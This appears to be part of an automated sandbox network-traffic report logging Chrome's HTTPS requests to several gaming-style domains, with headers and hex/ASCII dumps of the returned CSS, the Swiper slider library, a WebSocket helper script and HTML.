                                                                                                                                                          Data Ascii: t-animation:HongbaoRain-data-v-583e4de6 .76667s linear 1}.hbsd-24[data-v-583e4de6]{top:100%;animation:HongbaoRain-data-v-583e4de6 .8s linear 1;-ms-animation:HongbaoRain-data-v-583e4de6 .8s linear 1;-webkit-animation:HongbaoRain-data-v-583e4de6 .8s linear
                                                                                                                                                          2024-06-09 22:40:53 UTC16384INData Raw: 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 2e 35 72 65 6d 7d 2e 66 69 78 65 64 2d 68 62 2d 77 72 61 70 20 2e 67 72 69 64 5b 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 5d 7b 77 69 64 74 68 3a 31 32 2e 35 25 3b 68 65 69 67 68 74 3a 31 36 2e 36 36 36 36 37 76 68 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 66 69 78 65 64 2d 68 62 2d 77 72 61 70 20 2e 67 72 69 64 20 2e 68 62 5b 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 5d 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 38 31 30 30 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 66 69 78 65 64 2d 68 62 2d 77 72 61 70 20 2e 67 72 69 64 20 2e 68 62 2e
                                                                                                                                                          Data Ascii: lex;-ms-flex-wrap:wrap;flex-wrap:wrap;margin-top:1.5rem}.fixed-hb-wrap .grid[data-v-583e4de6]{width:12.5%;height:16.66667vh;position:relative}.fixed-hb-wrap .grid .hb[data-v-583e4de6]{position:absolute;z-index:8100;cursor:pointer}.fixed-hb-wrap .grid .hb.
                                                                                                                                                          2024-06-09 22:40:53 UTC16384INData Raw: 64 69 6e 67 3a 32 30 70 78 20 32 30 70 78 20 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 6d 73 67 2d 62 6f 78 2d 6d 61 69 6e 20 2e 6d 73 67 2d 62 6f 78 2d 62 6f 64 79 20 75 6c 20 6c 69 5b 64 61 74 61 2d 76 2d 38 35 35 62 61 65 38 30 5d 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 32 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 7d 2e 6d 73 67 2d 62 6f 78 2d 6d 61 69 6e 20 2e 6d 73 67 2d 62 6f 78 2d 62 6f 64 79 20 75 6c 20 6c 69 2e 72 65 64 5b 64 61 74 61 2d 76 2d 38 35 35 62 61 65 38 30 5d 7b 63 6f 6c 6f 72 3a 23 63 30 30 7d 2e 63 6f 6e 76 65 72 73 69 6f 6e 5b 64 61 74 61 2d 76 2d 32 39 39 35 34 62 65 64 5d 7b 6d 69 6e 2d 77 69 64 74 68 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 6f 70 3a 30 3b 72 69 67 68 74 3a 30 3b 62 6f 74
                                                                                                                                                          Data Ascii: ding:20px 20px 0;overflow:hidden}.msg-box-main .msg-box-body ul li[data-v-855bae80]{line-height:22px;color:#000}.msg-box-main .msg-box-body ul li.red[data-v-855bae80]{color:#c00}.conversion[data-v-29954bed]{min-width:500px;position:fixed;top:0;right:0;bot
                                                                                                                                                          2024-06-09 22:40:53 UTC16384INData Raw: 65 20 69 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 69 6d 70 6f 72 74 2d 70 61 73 73 77 6f 72 64 2d 6d 61 69 6e 20 2e 69 70 70 77 2d 72 6f 77 7b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 35 70 78 20 30 7d 2e 69 6d 70 6f 72 74 2d 70 61 73 73 77 6f 72 64 2d 6d 61 69 6e 20 2e 69 70 70 77 2d 72 6f 77 2e 69 70 70 77 2d 65 72 72 6f 72 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 39 30 70 78 7d 2e 69
                                                                                                                                                          Data Ascii: e i{color:#fff}.import-password-main .ippw-row{display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;padding:5px 0}.import-password-main .ippw-row.ippw-error{padding-top:0;margin-left:90px}.i
                                                                                                                                                          2024-06-09 22:40:53 UTC16384INData Raw: 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 2e 73 6b 69 74 74 65 72 2d 73 71 75 61 72 65 20 2e 6e 65 78 74 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 35 35 70 78 3b 72 69 67 68 74 3a 31 30 70 78 7d 2e 73 6b 69 74 74 65 72 2d 73 71 75 61 72 65 20 2e 6e 65 78 74 5f 62 75 74 74 6f 6e 2c 2e 73 6b 69 74 74 65 72 2d 73 71 75 61 72 65 20 2e 70 72 65 76 5f 62 75 74 74 6f 6e 7b 77 69 64 74 68 3a 35 35 70 78 3b 68 65 69 67 68 74 3a 35 35 70 78 3b 74 6f 70 3a 31 30 70 78 3b 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 2e 73 6b 69 74 74 65 72 2d 73 71 75 61 72 65 20 2e 70 72 65 76 5f 62 75 74 74 6f 6e 7b
                                                                                                                                                          Data Ascii: :auto;margin-top:0;transform:none}.skitter-square .next_button{background-position:0 -55px;right:10px}.skitter-square .next_button,.skitter-square .prev_button{width:55px;height:55px;top:10px;left:auto;margin:0;transform:none}.skitter-square .prev_button{
                                                                                                                                                          2024-06-09 22:40:53 UTC16384INData Raw: 2d 76 2d 31 63 35 38 62 37 66 36 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 70 63 2f 69 6d 61 67 65 2d 70 63 2f 6e 65 77 73 2f 37 36 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 7d 2e 6e 65 77 73 2d 68 65 61 64 65 72 2e 6e 65 77 73 2d 69 63 6f 6e 2d 37 37 5b 64 61 74 61 2d 76 2d 31 63 35 38 62 37 66 36 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 70 63 2f 69 6d 61 67 65 2d 70 63 2f 6e 65 77 73 2f 37 37 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 7d 2e 6e 65 77 73 2d 68 65 61 64 65 72 2e 6e 65 77 73 2d 69 63 6f 6e 2d 37 38 5b 64 61 74 61 2d 76 2d 31 63 35 38 62 37 66 36 5d 7b 62 61 63 6b 67 72
                                                                                                                                                          Data Ascii: -v-1c58b7f6]{background-image:url(/pc/image-pc/news/76.png);background-repeat:no-repeat}.news-header.news-icon-77[data-v-1c58b7f6]{background-image:url(/pc/image-pc/news/77.png);background-repeat:no-repeat}.news-header.news-icon-78[data-v-1c58b7f6]{backgr
                                                                                                                                                          2024-06-09 22:40:53 UTC16384INData Raw: 65 28 39 30 64 65 67 29 3b 6f 70 61 63 69 74 79 3a 30 7d 7d 2e 72 6f 74 61 74 65 4f 75 74 55 70 52 69 67 68 74 7b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 72 6f 74 61 74 65 4f 75 74 55 70 52 69 67 68 74 7d 40 6b 65 79 66 72 61 6d 65 73 20 68 69 6e 67 65 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 74 6f 70 20 6c 65 66 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65 2d 69 6e 2d 6f 75 74 7d 32 30 25 2c 36 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 38 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 74 6f 70 20 6c 65 66 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65 2d 69 6e 2d 6f 75 74 7d 34 30 25 2c 38
                                                                                                                                                          Data Ascii: e(90deg);opacity:0}}.rotateOutUpRight{animation-name:rotateOutUpRight}@keyframes hinge{0%{transform-origin:top left;animation-timing-function:ease-in-out}20%,60%{transform:rotate(80deg);transform-origin:top left;animation-timing-function:ease-in-out}40%,8
                                                                                                                                                          2024-06-09 22:40:53 UTC16384INData Raw: 62 79 2d 6e 65 77 20 2e 6e 61 76 20 2e 70 72 6f 76 69 64 65 72 2d 73 6c 69 64 65 20 2e 73 6c 69 64 65 2d 69 74 65 6d 20 2e 77 72 61 70 20 2e 74 68 69 72 64 2d 6d 65 6e 75 2e 62 67 5b 64 61 74 61 2d 76 2d 65 33 31 35 62 65 31 63 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 70 63 2f 69 6d 61 67 65 2d 70 63 2f 67 61 6d 65 2f 6c 6f 62 62 79 2f 6d 65 6e 75 2f 62 67 2e 70 6e 67 29 7d 2e 67 61 6d 65 2d 6c 6f 62 62 79 2d 6e 65 77 20 2e 6e 61 76 20 2e 70 72 6f 76 69 64 65 72 2d 73 6c 69 64 65 20 2e 73 6c 69 64 65 2d 69 74 65 6d 20 2e 77 72 61 70 20 2e 74 68 69 72 64 2d 6d 65 6e 75 2e 66 67 5b 64 61 74 61 2d 76 2d 65 33 31 35 62 65 31 63 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 70 63 2f 69 6d 61 67 65 2d 70
                                                                                                                                                          Data Ascii: by-new .nav .provider-slide .slide-item .wrap .third-menu.bg[data-v-e315be1c]{background-image:url(/pc/image-pc/game/lobby/menu/bg.png)}.game-lobby-new .nav .provider-slide .slide-item .wrap .third-menu.fg[data-v-e315be1c]{background-image:url(/pc/image-p


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          122192.168.2.549859183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:52 UTC554OUTGET /ftl/commonPage/js/idangerous.swiper.min.js HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:53 UTC704INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 45187
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XY-MP-24-02
                                                                                                                                                          ETag: "64d5b951-b083"
                                                                                                                                                          Date: Thu, 06 Jun 2024 12:04:53 GMT
                                                                                                                                                          Last-Modified: Fri, 11 Aug 2023 04:30:09 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 12:04:53 GMT
                                                                                                                                                          Age: 297360
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;xymp24:80;
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-XY-MP-24-02
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-14
                                                                                                                                                          X-Cdn-Request-ID: f7a603086ce935ba5100535a1b248576
                                                                                                                                                          2024-06-09 22:40:53 UTC15680INData Raw: 2f 2a 0a 20 2a 20 53 77 69 70 65 72 20 32 2e 37 2e 30 0a 20 2a 20 4d 6f 62 69 6c 65 20 74 6f 75 63 68 20 73 6c 69 64 65 72 20 61 6e 64 20 66 72 61 6d 65 77 6f 72 6b 20 77 69 74 68 20 68 61 72 64 77 61 72 65 20 61 63 63 65 6c 65 72 61 74 65 64 20 74 72 61 6e 73 69 74 69 6f 6e 73 0a 20 2a 0a 20 2a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 64 61 6e 67 65 72 6f 2e 75 73 2f 73 6c 69 64 65 72 73 2f 73 77 69 70 65 72 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 30 2d 32 30 31 34 2c 20 56 6c 61 64 69 6d 69 72 20 4b 68 61 72 6c 61 6d 70 69 64 69 0a 20 2a 20 54 68 65 20 69 44 61 6e 67 65 72 6f 2e 75 73 0a 20 2a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 64 61 6e 67 65 72 6f 2e 75 73 2f 0a 20 2a 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 47
                                                                                                                                                          Data Ascii: /* * Swiper 2.7.0 * Mobile touch slider and framework with hardware accelerated transitions * * http://www.idangero.us/sliders/swiper/ * * Copyright 2010-2014, Vladimir Kharlampidi * The iDangero.us * http://www.idangero.us/ * * Licensed under G
                                                                                                                                                          2024-06-09 22:40:53 UTC16384INData Raw: 65 66 74 3d 30 2c 43 2e 77 72 61 70 70 65 72 52 69 67 68 74 3d 30 2c 43 2e 77 72 61 70 70 65 72 54 6f 70 3d 30 2c 43 2e 77 72 61 70 70 65 72 42 6f 74 74 6f 6d 3d 30 2c 43 2e 69 73 41 6e 64 72 6f 69 64 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 61 6e 64 72 6f 69 64 22 29 3e 3d 30 3b 76 61 72 20 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 3d 7b 65 76 65 6e 74 54 61 72 67 65 74 3a 22 77 72 61 70 70 65 72 22 2c 6d 6f 64 65 3a 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 2c 74 6f 75 63 68 52 61 74 69 6f 3a 31 2c 73 70 65 65 64 3a 33 30 30 2c 66 72 65 65 4d 6f 64 65 3a 21 31 2c 66 72 65 65 4d 6f 64 65 46 6c 75 69 64 3a 21 31 2c 6d 6f 6d 65 6e 74 75 6d 52 61 74 69 6f 3a 31 2c 6d 6f 6d 65
                                                                                                                                                          Data Ascii: eft=0,C.wrapperRight=0,C.wrapperTop=0,C.wrapperBottom=0,C.isAndroid=navigator.userAgent.toLowerCase().indexOf("android")>=0;var D,E,F,G,H,I,J={eventTarget:"wrapper",mode:"horizontal",touchRatio:1,speed:300,freeMode:!1,freeModeFluid:!1,momentumRatio:1,mome
                                                                                                                                                          2024-06-09 22:40:53 UTC13123INData Raw: 72 20 69 3d 43 2e 6c 6f 6f 70 65 64 53 6c 69 64 65 73 3b 43 2e 61 63 74 69 76 65 4c 6f 6f 70 49 6e 64 65 78 3d 43 2e 61 63 74 69 76 65 49 6e 64 65 78 2d 69 2c 43 2e 61 63 74 69 76 65 4c 6f 6f 70 49 6e 64 65 78 3e 3d 43 2e 73 6c 69 64 65 73 2e 6c 65 6e 67 74 68 2d 32 2a 69 26 26 28 43 2e 61 63 74 69 76 65 4c 6f 6f 70 49 6e 64 65 78 3d 43 2e 73 6c 69 64 65 73 2e 6c 65 6e 67 74 68 2d 32 2a 69 2d 43 2e 61 63 74 69 76 65 4c 6f 6f 70 49 6e 64 65 78 29 2c 43 2e 61 63 74 69 76 65 4c 6f 6f 70 49 6e 64 65 78 3c 30 26 26 28 43 2e 61 63 74 69 76 65 4c 6f 6f 70 49 6e 64 65 78 3d 43 2e 73 6c 69 64 65 73 2e 6c 65 6e 67 74 68 2d 32 2a 69 2b 43 2e 61 63 74 69 76 65 4c 6f 6f 70 49 6e 64 65 78 29 2c 43 2e 61 63 74 69 76 65 4c 6f 6f 70 49 6e 64 65 78 3c 30 26 26 28 43 2e 61
                                                                                                                                                          Data Ascii: r i=C.loopedSlides;C.activeLoopIndex=C.activeIndex-i,C.activeLoopIndex>=C.slides.length-2*i&&(C.activeLoopIndex=C.slides.length-2*i-C.activeLoopIndex),C.activeLoopIndex<0&&(C.activeLoopIndex=C.slides.length-2*i+C.activeLoopIndex),C.activeLoopIndex<0&&(C.a


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          123192.168.2.549860183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:52 UTC548OUTGET /ftl/commonPage/js/websocket/Comet.js HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:53 UTC715INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 17340
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-CHANGZ-MP-01-13
                                                                                                                                                          ETag: "60f60fb5-43bc"
                                                                                                                                                          Date: Thu, 06 Jun 2024 12:04:55 GMT
                                                                                                                                                          Last-Modified: Mon, 19 Jul 2021 23:50:13 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 12:04:55 GMT
                                                                                                                                                          Age: 297358
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;changzmp01:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-CHANGZ-MP-01-13
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-06
                                                                                                                                                          X-Cdn-Request-ID: 51990f95cb1343ca520cf26a61fd1c92
                                                                                                                                                          2024-06-09 22:40:53 UTC15669INData Raw: 2f 2a 2a 0a 20 2a 0a 20 2a 2f 0a 66 75 6e 63 74 69 6f 6e 20 4d 53 69 74 65 43 6f 6d 65 74 28 29 20 7b 0a 7d 0a 0a 4d 53 69 74 65 43 6f 6d 65 74 2e 70 72 6f 74 6f 74 79 70 65 20 3d 20 7b 0a 0a 20 20 20 20 2f 2a 2a 20 e8 af b7 e6 b1 82 e5 8f 82 e6 95 b0 e5 90 8d ef bc 9a e5 90 8c e6 ad a5 20 2a 2f 0a 20 20 20 20 53 59 4e 43 48 52 4f 4e 49 5a 45 5f 4b 45 59 3a 20 22 5f 53 5f 43 4f 4d 45 54 22 2c 0a 20 20 20 20 2f 2a 2a 20 e5 90 8c e6 ad a5 e5 80 bc ef bc 9a e5 88 9b e5 bb ba e8 bf 9e e6 8e a5 20 2a 2f 0a 20 20 20 20 43 4f 4e 4e 45 43 54 49 4f 4e 5f 56 41 4c 55 45 3a 20 22 43 22 2c 0a 20 20 20 20 2f 2a 2a 20 e5 90 8c e6 ad a5 e5 80 bc ef bc 9a e6 96 ad e5 bc 80 e8 bf 9e e6 8e a5 20 2a 2f 0a 20 20 20 20 44 49 53 43 4f 4e 4e 45 43 54 5f 56 41 4c 55 45 3a 20 22
                                                                                                                                                          Data Ascii: /** * */function MSiteComet() {}MSiteComet.prototype = { /** */ SYNCHRONIZE_KEY: "_S_COMET", /** */ CONNECTION_VALUE: "C", /** */ DISCONNECT_VALUE: "
                                                                                                                                                          2024-06-09 22:40:53 UTC1671INData Raw: 63 61 6c 6c 65 72 20 3f 20 63 61 6c 6c 65 72 20 3a 20 6e 75 6c 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 63 61 6c 6c 62 61 63 6b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 6c 6c 62 61 63 6b 2e 63 61 6c 6c 28 63 61 6c 6c 65 72 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 2c 0a 20 20 20 20 6f 6e 57 65 62 73 6f 63 6b 65 74 4f 70 65 6e 3a 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 2f 2f 20 63 75 72 72 65 6e 74 20 70 6f 73 74 69 6f 6e 20 22 74 68 69 73 22 20 3d 20 77 65 62 73 6f 63 6b 65 74 0a 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 54 68 69 73 20 3d 20 74 68
                                                                                                                                                          Data Ascii: caller ? caller : null; if (callback) { callback.call(caller); } } }); }, onWebsocketOpen: function () { // current postion "this" = websocket var outThis = th


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          124192.168.2.549864202.61.87.2244434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:53 UTC632OUTGET / HTTP/1.1
                                                                                                                                                          Host: wns732.cc
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:53 UTC407INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:53 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 48883
                                                                                                                                                          Connection: close
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Last-Modified: Tue, 06 Jun 2023 07:31:39 GMT
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          ETag: "647ee0db-bef3"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: EXPIRED
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:53 UTC15977INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 57 65 6c 63 6f 6d 65 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 73 74 79 6c 65
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1"> <meta property="og:description" content="Welcome"> <title></title> <style
                                                                                                                                                          2024-06-09 22:40:53 UTC16384INData Raw: 20 38 36 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 32 38 70 78 0d 0a 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 6c 6f 61 64 69 6e 67 2d 69 6e 6e 65 72 2d 33 20 7b 0d 0a 20 20 20 20 20 20 30 25 20 7b 0d 0a 20 20 20 20 20 20 20 20 74 6f 70 3a 20 37 39 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 34 32 70 78 0d 0a 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 35 30 25 20 7b 0d 0a 20 20 20 20 20 20 20 20 74 6f 70 3a 20 38 36 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 32 38 70 78 0d 0a 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 31 30 30 25 20 7b 0d 0a 20 20 20 20 20 20 20 20 74 6f 70 3a 20 38 36 70 78 3b 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                          Data Ascii: 86px; height: 28px } } @keyframes loading-inner-3 { 0% { top: 79px; height: 42px } 50% { top: 86px; height: 28px } 100% { top: 86px;
